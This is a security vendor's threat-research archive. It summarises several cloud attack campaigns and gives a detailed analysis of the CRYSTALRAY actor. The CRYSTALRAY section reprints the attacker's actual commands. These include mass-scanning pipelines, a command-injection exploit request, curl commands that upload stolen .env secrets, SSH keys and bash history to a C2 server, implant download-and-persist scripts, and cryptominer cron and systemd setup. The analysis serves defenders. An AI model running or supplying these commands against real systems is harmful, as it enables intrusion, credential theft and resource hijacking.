Threat Research Archives | Sysdig

Sysdig Threat Research Team – Black Hat 2024 (Mon, 22 Jul 2024)

The Sysdig Threat Research Team (TRT) is on a mission to help secure innovation at cloud speeds.

A group of some of the industry’s most elite threat researchers, the Sysdig TRT discovers and educates on the latest cloud-native security threats, vulnerabilities, and attack patterns.

We are fiercely passionate about security and committed to the cause. Stay up to date here on the latest insights, trends to monitor, and crucial best practices for securing your cloud-native environments.

Below, we will detail the latest research and how we have improved the security ecosystem.

And if you want to chat with us further, look us up at the Sysdig booth at Black Hat 2024!

LLMJACKING

The Sysdig Threat Research Team (TRT) recently observed a new attack known as LLMjacking. This attack leverages stolen cloud credentials to target ten cloud-hosted large language model (LLM) services.

Once initial access was obtained, the attackers exfiltrated cloud credentials and gained access to the cloud environment, where they attempted to access local LLM models hosted by cloud providers; in this instance, a local Claude (v2/v3) model from Anthropic was targeted. If undiscovered, this type of attack could cost the victim over $46,000 in LLM consumption per day.

Sysdig researchers discovered evidence of a reverse proxy for LLMs being used to provide access to the compromised accounts, suggesting a financial motivation.  However, another possible motivation is to extract LLM training data. 

All major cloud providers now host large language model (LLM) services, including Azure Machine Learning, GCP’s Vertex AI, and AWS Bedrock. These platforms give developers easy access to the popular models used in LLM-based AI.

The attackers aim to gain access to a large number of LLM models across different services. No legitimate LLM queries were actually run during the verification phase; instead, they did just enough to determine what the credentials were capable of and what quotas applied. Where possible, they also queried logging settings, in order to avoid detection when later using the compromised credentials to run their prompts.

The ability to quickly detect and respond to those threats is crucial for maintaining strong defense systems. Essential tools like Falco, Sysdig Secure, and CloudWatch Alerts help monitor runtime activity and analyze cloud logs to identify suspicious behaviors. Comprehensive logging, including verbose logging, provides deep visibility into the cloud environment’s activities. This detailed information allows organizations to gain a nuanced understanding of critical actions, such as model invocations, within their cloud infrastructure.

SSH-SNAKE

SSH-Snake is a self-modifying worm that leverages SSH credentials discovered on a compromised system to start spreading itself throughout the network. The worm automatically searches through known credential locations and shell history files to determine its next move. SSH-Snake is actively being used by threat actors in offensive operations. 
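As an illustration of that discovery step, here is a minimal sketch (a toy reimplementation against a fake home directory, not SSH-Snake’s actual code) of checking a well-known key location and mining shell history for previously contacted hosts:

```shell
# Toy sketch of SSH-Snake-style credential discovery (illustrative only).
# Build a fake home directory to search, so the example is self-contained.
home=$(mktemp -d)
mkdir -p "$home/.ssh"
printf 'FAKE PRIVATE KEY\n' > "$home/.ssh/id_rsa"
printf 'ssh root@10.0.0.5\n' > "$home/.bash_history"

# 1) Look for private keys in well-known locations.
keys=$(find "$home/.ssh" -type f \( -name 'id_rsa' -o -name 'id_ed25519' \) 2>/dev/null)

# 2) Mine shell history for hosts the user has already reached over SSH.
hosts=$(grep -h -o 'ssh [^ ]*' "$home/.bash_history" 2>/dev/null)

echo "$keys"
echo "$hosts"   # ssh root@10.0.0.5
```

The real worm goes much further (config files, known_hosts, agent sockets), but the pattern of enumerating credential locations and replaying history is the same.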

Sysdig TRT uncovered the command and control (C2) server of threat actors deploying SSH-Snake. This server holds a repository of files containing the output of SSH-Snake for each of the targets they have gained access to. 

Filenames found on the C2 server contain IP addresses of victims, which allowed us to make a high-confidence assessment that these threat actors are actively exploiting known Confluence vulnerabilities in order to gain initial access and deploy SSH-Snake. This does not preclude other exploits from being used, but many of the victims are running Confluence.  

The output of SSH-Snake contains the credentials found, the targets’ IPs, and the victims’ bash history. The victim list is growing, which means that this is an ongoing operation. At the time of writing, the number of victims is approximately 300.

The Rebirth Botnet

In March 2024, the Sysdig Threat Research Team (TRT) began observing attacks against one of our Hadoop honeypot services from the domain “rebirthltd[.]com.” Upon investigation, we discovered that the domain pertains to a mature and increasingly popular DDoS-as-a-Service botnet: the Rebirth Botnet. The service is based on the Mirai malware family, and the operators advertise its services through Telegram and an online store (rebirthltd.mysellix[.]io).

The threat actors operating the botnet are financially motivated and advertise their service primarily to the video gaming community. Although there is no evidence that the botnet is being purchased for purposes beyond gaming, organizations may still be at risk of being exploited and becoming part of the botnet. We’ve taken a detailed look at how this group operates from both a business and a technical point of view.

At the core of RebirthLtd’s business is its DDoS botnet, which is rented out to whoever is willing to pay. RebirthLtd offers its services through a variety of packages listed on a web-based storefront that has been registered since August 2022. The cheapest plan, for which a buyer can purchase a subscription and immediately receive access to the botnet’s services, is priced at $15. The basic plan seems to include only access to the botnet’s executables and limited functionality in terms of the available number of infected clients. More expensive plans include API access, C2 server availability, and improved features, such as the number of attacks per second that can be launched.

The botnet’s main services target video game streaming platforms for financial gain, as its Telegram channel claims that RebirthHub (another moniker for the botnet, along with RebirthLtd) is capable of “hitting almost all types of game servers.” The Rebirth admin team is quite active on YouTube and TikTok as well, where they showcase the botnet’s capabilities to potential customers. Through our investigation, we identified more than 100 previously undetected executables of this malware family.

SCARLETEEL

The attack graph we observed for this group is as follows: compromise AWS accounts by exploiting vulnerable compute services, gain persistence, and attempt to make money using cryptominers. Had we not thwarted their attack, our conservative estimate is that their mining would have cost the victim over $4,000 per day until stopped.

We know they are after more than cryptomining: they are also stealing intellectual property. In their most recent attack, the actor discovered and exploited a customer mistake in an AWS policy to escalate privileges to AdministratorAccess, gaining full control over the account. We also watched them target Kubernetes in order to scale their attack significantly.

AMBERSQUID

Keeping with the cloud threats, Sysdig TRT has uncovered a novel cloud-native cryptojacking operation which they’ve named AMBERSQUID. This operation leverages AWS services not commonly used by attackers, such as AWS Amplify, AWS Fargate, and Amazon SageMaker. The uncommon nature of these services means that they are often overlooked from a security perspective, and the AMBERSQUID operation can cost victims more than $10,000/day.

The AMBERSQUID operation exploited cloud services without triggering AWS’s approval requirement for additional resources, which would have applied had they only spun up EC2 instances. Targeting multiple services also complicates incident response, since it requires finding and killing every miner in each exploited service.

We discovered AMBERSQUID by analyzing over 1.7M Linux images to understand what malicious payloads are hiding in the container images on Docker Hub.

This dangerous container image didn’t raise any alarms during static scanning for known indicators or malicious binaries. It was only when the container was run that its cross-service cryptojacking activities became obvious. This is consistent with the findings of our 2023 Cloud Threat Report, in which we noted that 10% of malicious images are missed by static scanning alone.

MESON NETWORK

Sysdig TRT discovered a malicious campaign using the blockchain-based Meson service to reap rewards ahead of the crypto token unlock happening around March 15th 2024. Within minutes, the attacker attempted to create 6,000 Meson Network nodes using a compromised cloud account. The Meson Network is a decentralized content delivery network (CDN) that operates in Web3 by establishing a streamlined bandwidth marketplace through a blockchain protocol.

Within minutes, the attacker was able to spawn almost 6,000 instances across multiple regions inside the compromised account and execute the meson_cdn binary. This comes at a huge cost for the account owner: we estimate more than $2,000 per day for all the Meson network nodes created, even using only micro sizes. That doesn’t count the potential cost of public IP addresses, which could run as much as $22,000 a month for 6,000 nodes. Estimating the amount and value of reward tokens the attacker could earn is difficult, since Meson tokens had not yet been priced on the public market.
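As a back-of-the-envelope check (the hourly compute rate below is an assumption for illustration; actual AWS pricing varies by instance type and region), the numbers are easy to reproduce:

```shell
# Rough daily compute cost: 6,000 micro instances at an assumed ~$0.015/hour.
daily_compute=$(awk 'BEGIN { printf "%.0f", 6000 * 0.015 * 24 }')

# Rough monthly public IPv4 cost: 6,000 addresses at $0.005/hour (AWS's
# public IPv4 charge introduced in February 2024), over a 30-day month.
monthly_ips=$(awk 'BEGIN { printf "%.0f", 6000 * 0.005 * 24 * 30 }')

echo "compute/day: \$$daily_compute"
echo "ips/month:   \$$monthly_ips"
```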

As in the case of AMBERSQUID, the image looks legitimate and safe from a static point of view, which involves analyzing its layers and vulnerabilities. However, during runtime execution, we monitored outbound network traffic and spotted gaganode being executed and making connections to malicious IPs.

Beyond Actors and New Threats: CVEs

Hunting for new malicious actors is not the TRT’s only purpose; the team also reacts quickly to newly published vulnerabilities and updates the product with new rules for runtime detection. Two recent examples are shown below.

CVE-2024-6387

On July 1st, Qualys’s security team announced CVE-2024-6387, a remotely exploitable vulnerability in the OpenSSH server. This critical vulnerability is nicknamed “regreSSHion” because its root cause is the accidental removal of code that fixed a much earlier vulnerability, CVE-2006-5051, back in 2006. The race condition affects the default configuration of sshd (the SSH daemon).

OpenSSH versions older than 4.4p1 (unless patched for CVE-2006-5051 and CVE-2008-4109) and versions from 8.5p1 up to, but not including, 9.8p1 are affected. The general guidance is to update to a fixed version; Ubuntu users can download updated packages.

Exploiting regreSSHion requires many attempts (thousands, in fact) executed within a fixed period of time. This exploit complexity is what downgrades the vulnerability from a “Critical” to a “High” risk classification.

Using Sysdig, we can detect drift from baseline sshd behavior. In this case, stateful detections track the number of failed attempts to authenticate with the sshd server. Falco rules alone detect point-in-time Indicators of Compromise (IoCs); by pulling these events into a global state table, Sysdig can instead detect a spike in actual failed authentication attempts for anonymous users, rather than relying on point-in-time alerting.
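The stateful idea can be sketched in plain shell (the sample log lines and the threshold of three failures are illustrative assumptions; Sysdig’s implementation keeps this state internally):

```shell
# Count failed sshd authentications per source IP and flag bursts.
# Log format and the >=3 threshold are assumptions for illustration.
log='Failed password for invalid user admin from 198.51.100.7
Failed password for invalid user admin from 198.51.100.7
Failed password for invalid user test from 198.51.100.7
Accepted password for alice from 203.0.113.9'

flagged=$(printf '%s\n' "$log" \
  | awk '/^Failed password/ { fails[$NF]++ }
         END { for (ip in fails) if (fails[ip] >= 3) print ip }')
echo "$flagged"   # 198.51.100.7
```

A real detection would also bound the count to a sliding time window, so slow background noise does not accumulate into a false positive.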

CVE-2024-3094

On March 29th, 2024, the Openwall mailing list announced a backdoor in XZ Utils, a popular package that includes the liblzma library used by sshd, a critical piece of Internet infrastructure for remote access. When the backdoored library is loaded, CVE-2024-3094 affects sshd authentication, potentially allowing intruders access regardless of the authentication method.

  • Affected versions: 5.6.0, 5.6.1
  • Affected Distributions: Fedora 41, Fedora Rawhide

For Sysdig Secure users, this rule is called “Backdoored library loaded into SSHD (CVE-2024-3094)” and can be found in the Sysdig Runtime Threat Detection policy.

- rule: Backdoored library loaded into SSHD (CVE-2024-3094)
  desc: A version of the liblzma library was seen loading which was backdoored by a malicious user in order to bypass SSHD authentication.
  condition: open_read and proc.name=sshd and (fd.name endswith "liblzma.so.5.6.0" or fd.name endswith "liblzma.so.5.6.1")
  output: SSHD loaded a vulnerable library (file=%fd.name proc.pname=%proc.pname gparent=%proc.aname[2] ggparent=%proc.aname[3] gggparent=%proc.aname[4] proc.cmdline=%proc.cmdline proc.cwd=%proc.cwd proc.pcmdline=%proc.pcmdline user.name=%user.name user.loginuid=%user.loginuid user.uid=%user.uid user.loginname=%user.loginname image=%container.image.repository container.id=%container.id container.name=%container.name)
  priority: WARNING
  tags: [host, container]

Sysdig Secure Solution

Sysdig Secure enables security and engineering teams to identify and eliminate vulnerabilities, threats, and misconfigurations in real-time. Leveraging runtime insights gives organizations an intuitive way to both visualize and analyze threat data. 

Sysdig Secure is powered by Falco’s unified detection engine. This cutting-edge engine leverages real-time behavioral insights and threat intelligence to continuously monitor multi-layered infrastructure and identify potential security incidents.

Whether it’s anomalous container activities, unauthorized access attempts, supply chain vulnerabilities, identity-based threats, or simply meeting your compliance requirements, Sysdig ensures that organizations have a unified, proactive defense against rapidly evolving threats.

MEET SYSDIG TRT AT BLACK HAT 2024

Sysdig Threat Research Team (TRT) members will be onsite at booth #1750 at Black Hat 2024, August 7–8 in Las Vegas, to share insights from their findings and analysis of some of the hottest and most important cybersecurity topics this year.

Reserve a time to connect with the Sysdig TRT team at the show!

CRYSTALRAY: Inside the Operations of a Rising Threat Actor Exploiting OSS Tools (Thu, 11 Jul 2024)

The Sysdig Threat Research Team (TRT) continued observation of the SSH-Snake threat actor we first identified in February 2024. New discoveries showed that the threat actor behind the initial attack expanded its operations greatly, justifying an identifier to further track and report on the actor and campaigns: CRYSTALRAY. This actor previously leveraged the SSH-Snake open source software (OSS) penetration testing tool during a campaign exploiting Confluence vulnerabilities. 

The team’s latest observations show that CRYSTALRAY’s operations have scaled 10x to over 1,500 victims and now include mass scanning, exploiting multiple vulnerabilities, and placing backdoors using multiple OSS security tools. 

CRYSTALRAY’s motivations are to collect and sell credentials, deploy cryptominers, and maintain persistence in victim environments. Some of the OSS tools the threat actor is leveraging include zmap, asn, httpx, nuclei, platypus, and SSH-Snake.

Released on 4 January 2024, SSH-Snake is a self-modifying worm that leverages SSH credentials discovered on a compromised system to start spreading itself throughout the network.

The worm automatically searches through known credential locations and shell history files to determine its next move.

By avoiding the easily detectable patterns associated with scripted attacks, the tool provides greater stealth, flexibility, and configurability, as well as more comprehensive credential discovery than typical SSH worms, making it more efficient and successful.

CRYSTALRAY

Technical Analysis

Reconnaissance processes and tools

CRYSTALRAY uses many tools from ProjectDiscovery, a legitimate OSS organization, including pdtm, a package manager used to install and maintain ProjectDiscovery’s open source tools. ProjectDiscovery has created a number of tools that we will see CRYSTALRAY abuse in its operations.

ASN

Rather than massive internet-wide ipv4 scans or very specific IP targets, CRYSTALRAY creates a range of IPs for specific countries to launch scans with more precision than a botnet, but less precision than an APT or ransomware attack. The United States and China combined for over 54% of the known targets. 

The attacker takes advantage of the ASN tool, a quick OSINT command-line utility for investigating network data. It can be used for reconnaissance by querying Shodan for data about any type of target (CIDR blocks, URLs, single IPs, or hostnames), quickly giving the user a complete breakdown of open ports, known vulnerabilities, and known software and hardware running on the target, all without ever sending a single packet to the target.

The attackers use it to generate IPv4/IPv6 CIDR blocks allocated to a given country by querying data from Marcel Bischoff’s country-ip-blocks repo. This (below) would be an example for Mexico:

$> asn -c .mx

The complete command to produce a file ready for automation is as follows:

$> asn -j -c .mx | jq -r '.results[0].ipv4[]' > mx_cidr.txt

Zmap

Once the targeted IP range is defined, CRYSTALRAY uses zmap to scan specific ports for vulnerable services. zmap is a single-packet network scanner designed for Internet-wide surveys; it is faster and produces fewer false positives than nmap. The attacker specifically uses zmap version 4.1.0 RC1 because it supports multi-port scanning, making scans more efficient. The following command is a simple example:

zmap -p <list-ports> -o zmap_results.csv -w cidr.txt 

To show this attacker’s depth of knowledge of zmap, here is one example of the many scans we discovered.

zmap -p 80,8090,7001,61616 --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o port_80_8090_7001_61616.csv -w cn_cidr.txt -b /etc/zmap/blocklist.conf -B 500M
  • -p 80,8090,7001,61616 → default ports for webservers, WebLogic, and ActiveMQ
  • --output-module=csv → CSV output
  • --output-fields=saddr,sport → record responding address and port
  • --output-filter='success=1 && repeat=0' → keep only successful, non-duplicate responses
  • --no-header-row → helps automation
  • -o port_80_8090_7001_61616.csv → output file
  • -w cn_cidr.txt → source range of IPs
  • -b /etc/zmap/blocklist.conf → blocklist
  • -B 500M → bandwidth cap

We observed the attacker trying to discover many different services during their zmap scans:

  • ActiveMQ
  • Confluence
  • Metabase
  • WebLogic
  • Solr
  • Openfire
  • RocketMQ
  • Laravel

Httpx

Once the attacker has the zmap results, they use httpx, a fast and multi-purpose HTTP toolkit that can run multiple probes using the retryablehttp library. The httpx toolkit is designed to maintain result reliability even with a high thread count. Essentially, the tool verifies whether a host is live or a false positive before it is checked for known vulnerabilities.

cat zmap_results.csv | sed 's/,/:/g' | sort -u | httpx -t 10000 -rl 1000000 -o httpx_output.txt -stream
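The first two stages of that pipeline simply rewrite zmap’s saddr,sport CSV rows into the deduplicated host:port form httpx expects; with dummy data:

```shell
# Turn zmap CSV output (addr,port) into unique host:port targets for httpx.
# The addresses below are documentation-range dummies.
targets=$(printf '203.0.113.10,8090\n203.0.113.10,8090\n198.51.100.4,80\n' \
  | sed 's/,/:/g' | sort -u)
echo "$targets"
```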

Nuclei

With these filtered results, the attackers perform a vulnerability scan using nuclei, a tool commonly used by many attackers. Nuclei is an open source vulnerability scanner that can operate at scale. With powerful and flexible templating, nuclei can be used to model all kinds of security checks.

Below is an example of the command used:

cat httpx_output.txt | grep 8090 | nuclei -tags confluence -s critical -bs 1000 -o confluence_rce.txt -stats -stream -c 1 -rl 1000  

Nuclei outputs which CVEs the target host is affected by. With these results, the attacker has a reliable list that can be used to proceed towards the exploitation phase of the attack. 

Observed CVEs used by this attacker:

  • CVE-2022-44877
  • CVE-2021-3129
  • CVE-2019-18394

Based on their exploitation patterns, CRYSTALRAY likely also took advantage of newer vulnerability tests for Confluence available in nuclei. 

In some cases, they used nuclei’s tags argument to detect possible honeypots on the ports they scanned, avoiding launching their tools against those targets in order to remain undetected. An example of these honeypot detectors is this project; it is not clear whether this one in particular was used.

cat 8098_http*.txt | grep 443 | sort -u | shuf | nuclei -tags honeypot -bs 1000 -c 1 -rl 100000 -o hpots.txt -stats -stream

The screenshot below shows the refinement from where CRYSTALRAY started with their enumeration using zmap, then filtering with httpx, and finally down to a much smaller list using nuclei.


In total, CRYSTALRAY managed to target more than 1,800 IPs during our research and, based on the data collected, this number may continue to grow. Below is the percentage of IPs per region affected by this campaign.

Initial Access

To gain access to its targets, CRYSTALRAY prefers to leverage existing vulnerability proof of concepts which they modify for their payload. Using the previously gathered list of targets, they perform checks to verify that those potential victims are vulnerable to the exploit they plan to use. The following commands are an example of how CRYSTALRAY conducts this process:

# Services vulnerable on port 2031

cat port_2031_httpx.txt | nuclei -s critical -tags centos -bs 500 -c 2 -rl 100000 -o 2031_nuclei.txt -stats -si 20 -stream

# Generate simple code to test the vulnerability

echo "curl ip.me" | base64

curl -X POST "https://<victim-IP>:2031/login/index.php?login=$(echo${IFS}Y3VybCBpcC5tZQo=${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash)" -H "Host: <victim-IP>:2031" -H "Cookie: cwpsrv-2dbdc5905576590830494c54c04a1b01=6ahj1a6etv72ut1eaupietdk82" -H "Content-Length: 40" -H "Origin: <victim-IP>:2031" -H "Content-Type: application/x-www-form-urlencoded" -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" -H "Referer: <victim-IP>:2031/login/index.php?login=failed" -H "Accept-Encoding: gzip, deflate" -H "Accept-Language: en" -H "Connection: close" --data-urlencode "username=root" --data-urlencode "password=toor" --data-urlencode "commit=Login" -k Y3VybCBpcC5tZQo=
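In the request above, ${IFS} stands in for spaces so the injected command survives input filtering; once expanded, the server-side shell simply decodes and runs the base64 string, which is the connectivity check generated in the previous step:

```shell
# What the injected $(echo${IFS}Y3VybCBpcC5tZQo=${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash)
# boils down to once ${IFS} is expanded to whitespace:
decoded=$(echo 'Y3VybCBpcC5tZQo=' | base64 -d)
echo "$decoded"   # curl ip.me
```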

# Get the exploit from GitHub and run it to the victim

git clone https://github.com/Chocapikk/CVE-2022-44877

cd CVE-2022-44877

chmod +x script.sh

./script.sh scan <victim-IP>:2031

# Modify the script and upload it to their automation system.

nano script.sh

At the very end, CRYSTALRAY edits the downloaded exploit to add their malicious payload, which is often a Platypus or Sliver client. This process is very similar for the other exploits they leverage, all of which take advantage of OSS tools and proofs of concept.

Lateral Movement

To impact as many resources as possible, attackers commonly conduct lateral movement once they achieve remote code execution (RCE). In this section, we will detail the tools and tactics CRYSTALRAY has successfully used to move laterally through victims’ environments.

SSH-SNAKE

TRT has already reported on CRYSTALRAY’s use of the OSS penetration testing tool SSH-SNAKE (two months after its release). SSH-SNAKE is a worm that uses SSH keys and credentials it discovers to propagate to new systems and repeat the process. All the while, SSH-Snake sends captured keys and bash histories back to its C2 server.

CRYSTALRAY ran the following command to send the results from victims to their C2:

if command -v curl >/dev/null 2>&1; then curl --max-time 100 https://raw.githubusercontent.com/MegaManSec/SSH-Snake/main/Snake.nocomments.sh | bash > /tmp/ssh.txt; id=$(curl -4 ip.me); curl --max-time 100 --user '<creds>' --upload-file "/tmp/ssh.txt" "<c2_server>/${id}_ssh.txt"; rm -f /tmp/ssh.txt; fi

The image below is an example of SSH keys identified in the output of the SSH-Snake tool:

Collection / Credential Access

Environment Credentials

Attackers don’t just want to move between servers accessible via SSH. TRT discovered that CRYSTALRAY also tries to move to other platforms, such as cloud providers. As TRT also reported with SCARLETEEL, attackers look for credentials in environment variables in order to grow their impact exponentially. This credential discovery process is performed automatically on every device the attacker gains access to. The following commands show how the attackers collect and upload the credentials:

tmp=$(find / -type f -name "*.env" -o -name "*.env.bak" -o -name "*config.env" -o -name "*.env.dist" -o -name "*.env.dev" -o -name "*.env.local" -o -name "*.env.backup" -o -name "*.environment" -o -name "*.envrc" -o -name "*.envs" -o -name "*.env~" | grep -v 'Permission denied' > tmp.txt; sed 's/^/cat /;' tmp.txt > cmd.sh; chmod +x cmd.sh; > /dev/null)

exe=$(bash cmd.sh > <env_variables>.txt)

path=$(find / -type f -name env_variables.txt | grep -v 'Permission denied')

id=$(curl -4 ip.me)

curl --upload-file $path <C2_server>/${id}_env_variables.txt

rm -f cmd.sh env_variables.txt tmp.txt

The attackers either use these credentials later or sell them in bulk on black markets, such as Telegram channels.

History Files

Bash command histories provide valuable information, but their extraction is not common among attackers because they are hard to process automatically. CRYSTALRAY uses two repositories to speed up this discovery of sensitive information hosted on the system.

In this case, we know that the history data was extracted and stored on CRYSTALRAY’s servers, likely to be analyzed for additional credentials or tokens surfacing in the collected data.

if command -v curl >/dev/null 2>&1; then

    tmpfile=$(mktemp -p /tmp); find / -name .bash_history -exec cat {} + 2>/dev/null > "$tmpfile" ; if [ -s "$tmpfile" ]; then id=$(curl -4 ip.me); curl --user '<creds>' --upload-file "$tmpfile" "<c2_server>/${id}_bash_history.txt"; fi; rm -f "$tmpfile"

fi

In the data collected during the original SSH-SNAKE investigation, we found 100 command histories. That number had grown to more than 300 at the time of this report.

Command and Control / Persistence 

Maintaining access to compromised systems is often a priority for attackers. This is a common practice that TRT has reported on twice before:

  • RUBYCARP is a recent case in which the actor used IRC servers for both internal and botnet communications, focusing on phishing campaigns and brute-force attacks.
  • RebirthLtd was based on a modified Mirai binary. It attacked gaming servers and used Telegram as a base of operations and to sell its services.

Sliver

Within CRYSTALRAY’s injection scripts, TRT discovered a script built to execute an unusual payload. During analysis, researchers found that this binary is a payload generated with Sliver, an open source, cross-platform adversary emulation/red team framework that can be used by organizations of all sizes to perform security testing. Sliver’s implants support C2 over Mutual TLS (mTLS), WireGuard, HTTP(S), and DNS, and are dynamically compiled with per-binary asymmetric encryption keys.

echo "hostctl"

if [ ! -f /tmp/hostctld ]; then

    download_file "<c2_server>/hostctld" "/tmp/hostctld"

    sleep 1

    chmod +x /tmp/hostctld

    nohup /tmp/hostctld >/dev/null 2>&1 &

fi

if ! pgrep -f /tmp/hostctld > /dev/null; then

    nohup /tmp/hostctld >/dev/null 2>&1 &

fi

if [ "$(id -u)" -eq 0 ]; then

    if command -v systemctl &>/dev/null; then

        systemctl stop ext4; systemctl disable ext4; systemctl stop sshb; systemctl disable sshb

        echo "User is root and systemctl is installed."

        curl -v --user "<creds>" <c2_server>/hostctld --output /usr/bin/hostctld && chmod +x /usr/bin/hostctld && chattr +i /usr/bin/hostctld

        echo -e "[Unit]\nDescription=Host Control Daemon\n\n[Service]\nExecStart=/usr/bin/hostctld\nRestart=always\nRestartSec=30\n\n[Install]\nWantedBy=multi-user.target" > /etc/systemd/system/hostctld.service

CRYSTALRAY runs the binary to maintain access to the system and connect back to a specific port on the C2 server; essentially, it registers victims once they are successfully exploited.

The actor also hosted two other payloads with the same purpose: db.exe, similar to the previous one, and linux_agent, created with emp3r0r, a post-exploitation framework for Linux/Windows. TRT has not discovered whether they have been used. All the IoCs are reported here.

Platypus

Researchers discovered the dashboard CRYSTALRAY uses to manage its victims, which is based on Platypus, an open source, web-based manager for multiple reverse shell sessions written in Go. Installation is quite simple; below is an example of running the latest version of the binary, with its output shown in the following image:

Platypus was previously reported in a cryptomining operation. TRT found more Platypus dashboards using the Shodan and Censys Internet-mapping services. By querying the default dashboard port, 7331, along with ports 13338 and 13339, which are used to manage reverse shell connections, researchers were able to locate more instances of Platypus. Since default ports can be changed, there are likely more out there.

Censys Dashboard

CRYSTALRAY ran Platypus on their server. The dashboard has been reset several times because this is an active campaign, and the number of victims varies from 100 to 400 depending on uptime. This is a screenshot of the dashboard:

Platypus Dashboard

CRYSTALRAY’s victims are added to the C2 using the following commands. It is also interesting to see how they search for a directory to which they have write permission.

writable_dir=$(find / -type d \( -writable -a ! -path "/tmp" -a ! -path "/tmp/*" \) -print -quit 2>/dev/null)

cd $writable_dir && curl -fsSL http://<c2_server>:13339/termite/<c2_server>:19951 -o wt && chmod +x wt && nohup ./wt >/dev/null 2>&1 &

writable_dir_2=$(find /var -type d \( -writable -a ! -path "/tmp" -a ! -path "/tmp/*" \) -print -quit 2>/dev/null)

cd $writable_dir_2 && wget -q http://<c2_server>/termite/<c2_server>:44521 -O .sys && chmod +x .sys && nohup ./.sys >/dev/null 2>&1 &

writable_dir_3=$(find /home -type d \( -writable -a ! -path "/tmp" -a ! -path "/tmp/*" \) -print -quit 2>/dev/null)

cd $writable_dir_3 && wget -q http://<c2_server>:13339/termite/<c2_server>:13337 -O netd && chmod +x netd && nohup ./netd >/dev/null 2>&1 &

Impact of CRYSTALRAY

Selling Credentials

As mentioned before, CRYSTALRAY is able to discover and extract credentials from vulnerable systems, which are then sold on black markets for thousands of dollars. The credentials being sold involve a multitude of services, including Cloud Service Providers and SaaS email providers.  

The raw data stolen from compromised hosts is stored in files on the attacker’s C2 server. Below is an example of a list of files. The filename starts with the IP address of the victim. 

As TRT found through CRYSTALRAY’s cryptomining activities, the attackers use an email address: contact4restore@airmail[.]cc. Using contact4restore, researchers searched for other related accounts and found contact4restore@proton[.]me. 

Cryptomining

As is typical in cloud attacks, once the attackers have access, they try to use victim resources for financial gain. CRYSTALRAY has two associated cryptominers. One looks older and makes little effort to hide itself, while the other is more sophisticated, with its mining pool hosted on the same C2 server.

The old script contains the following content to add the script to the crontab and download and run the miner. 

crontab -r

(crontab -l 2>/dev/null; echo "* * * * * curl -v --user 'qwerty:abc123' <c2_server>/lr/rotate --output /tmp/rotate && sh /tmp/rotate && rm -f /tmp/rotate") | crontab -

curl -v --user '<creds>' <c2_server>/lr/lr_linux --output /tmp/logrotate && chmod +x /tmp/logrotate

    /tmp/logrotate -o 51.222.12.201:10900 -u ZEPHYR3LgJXAXUmG23rRkN8LAALmt78re3a8PhWnnw5x8EZ5oEStbUuAWvyHnVUWL6EgURTv3MJeaXvn8HAfRQRNGhc89mAy8Ew3J.mx/contact4restore@airmail.cc -p x -a "rx/0" --no-huge-pages --background
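Cron-based persistence like the entry above can be audited by scanning crontab lines for download-and-execute patterns. The following is a defensive sketch, with an illustrative (not exhaustive) regex:

```shell
#!/bin/sh
# Flag crontab lines that download a file into /tmp and execute it,
# the persistence pattern used by the rotate script above.
pattern='(curl|wget) .*(--output|-O) /tmp/.*(sh|&&) /tmp/'

line='* * * * * curl -v --user qwerty:abc123 <c2_server>/lr/rotate --output /tmp/rotate && sh /tmp/rotate && rm -f /tmp/rotate'
echo "$line" | grep -Eq "$pattern" && echo "suspicious cron entry"

benign='0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf'
echo "$benign" | grep -Eq "$pattern" || echo "benign cron entry"
```

In practice you would feed this `crontab -l` output for each user plus the contents of /etc/cron.d.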

The discovered wallet is connected to Nanopool, and several of the workers matching the scripts are active. They are mining approximately $200 per month.

In a new script used in attacks over the course of April and May, CRYSTALRAY used a handcrafted config file with the mining pools hosted on the same server used to store stolen data and host the command and control. In this case, TRT was unable to check balances or wallets associated with their operations.

cat > /usr/bin/config.json <<EOF
{
    "autosave": true,
    "cpu": {
        "enabled": true,
        "huge-pages": true,
        "yield": true,
        "max-threads-hint": 100
    },
    "opencl": false,
    "cuda": false,
    "randomx": {
        "init": -1,
        "init-avx2": -1,
        "mode": "auto",
        "1gb-pages": true,
        "rdmsr": true,
        "wrmsr": true,
        "cache_qos": false,
        "numa": true,
        "scratchpad_prefetch_mode": 1
    },
    "pools": [
        {
            "url": "<c2_server>:3333"
        },
        {
            "url": "<c2_server>:3333"
        }
    ]
}
EOF

if ! pgrep -x "logrotate" > /dev/null
then
    # The process is not running, execute your commands here
    echo "logrotate is not running. Executing commands..."
    # Replace the following line with the commands you want to execute
    curl -v --user '<creds>' <c2_server>/lr/lr_linux --output /tmp/logrotate && chmod +x /tmp/logrotate
    /tmp/logrotate -o <c2_server>:3333 --background --cpu-no-yield
    curl -v --user '<creds>' <c2_server>/lr_linux --output /usr/bin/log_rotate && chmod +x /usr/bin/log_rotate && chattr +i /usr/bin/log_rotate
    echo -e "[Unit]\nDescription=Host Control Daemon\n\n[Service]\nExecStart=/usr/bin/log_rotate\nRestart=always\nRestartSec=30\n\n[Install]\nWantedBy=multi-user.target" > /etc/systemd/system/log_rotate.service
fi
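The script above installs a `log_rotate.service` systemd unit so the miner is restarted every 30 seconds if killed. Units whose ExecStart points at generically named binaries can be surfaced with a simple audit; this sketch uses a scratch directory in place of /etc/systemd/system:

```shell
#!/bin/sh
# Audit sketch: list ExecStart targets of systemd units so that unfamiliar
# services such as the "Host Control Daemon" above stand out.
unitdir=$(mktemp -d)   # stand-in for /etc/systemd/system
printf '[Unit]\nDescription=Host Control Daemon\n\n[Service]\nExecStart=/usr/bin/log_rotate\nRestart=always\nRestartSec=30\n\n[Install]\nWantedBy=multi-user.target\n' \
    > "$unitdir/log_rotate.service"

# Print unit file and ExecStart target for review.
grep -H '^ExecStart=' "$unitdir"/*.service
rm -rf "$unitdir"
```

Note the `chattr +i` in the attacker's script: the immutable flag must be cleared (`chattr -i`) before the dropped binary can be removed.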

Kill Competitor Processes

CRYSTALRAY also has a script to remove other cryptominers that victims may already have running. This is a common tactic used by attackers to make sure they have sole use of all of the victims’ resources. Since many attackers are covering the same attack surfaces, they are likely to come across previously compromised systems.

Recommendations

